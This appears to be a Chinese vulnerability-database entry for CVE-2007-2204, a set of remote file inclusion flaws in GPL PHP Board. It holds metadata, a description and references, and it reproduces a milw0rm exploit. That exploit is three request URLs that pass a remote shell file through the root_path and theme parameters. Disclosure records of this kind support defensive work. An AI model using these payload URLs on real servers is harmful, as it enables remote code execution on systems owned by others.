GPL PHP Board 多个远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112788 漏洞类型 输入验证
发布时间 2007-04-24 更新时间 2007-04-25
CVE编号 CVE-2007-2204 CNNVD-ID CNNVD-200704-443
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/3786
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-443
|漏洞详情
GPLPHPBoard(GPB)中存在多个PHP远程文件包含漏洞。远程攻击者可以借助提交到(1)db.mysql.inc.php或(2)gpb.inc.php的root_path参数或到themes/ubb/login.php的(3)theme参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
#GPB bulletin board Remote file include                                                        

#Download script : http://gpb.sourceforge.net/download/archive/gpb-unstable-2001.11.14-1.tar.gz

#D0rk : Download Script and install it in ur machine

#Exploit :

#http://localhost/[gpb_path]/themes/ubb/login.php?theme=shell.txt?

#http://localhost/gpb/include/db.mysql.inc.php?root_path= shell.txt?

#http://localhost/gpb/include/gpb.inc.php?root_path=shell.txt?

#Discovered by : ThE TiGeR

#Miro_Tiger100[at]hotmail[dot]com

# milw0rm.com [2007-04-24]
|参考资料

来源:MILW0RM
名称:3786
链接:http://www.milw0rm.com/exploits/3786
来源:OSVDB
名称:37541
链接:http://osvdb.org/37541
来源:OSVDB
名称:37540
链接:http://osvdb.org/37540
来源:OSVDB
名称:37539
链接:http://osvdb.org/37539
来源:XF
名称:gpb-multiple-script-file-include(33839)
链接:http://xforce.iss.net/xforce/xfdb/33839
来源:BID
名称:23622
链接:http://www.securityfocus.com/bid/23622
来源:VUPEN
名称:ADV-2007-1514
链接:http://www.frsirt.com/english/advisories/2007/1514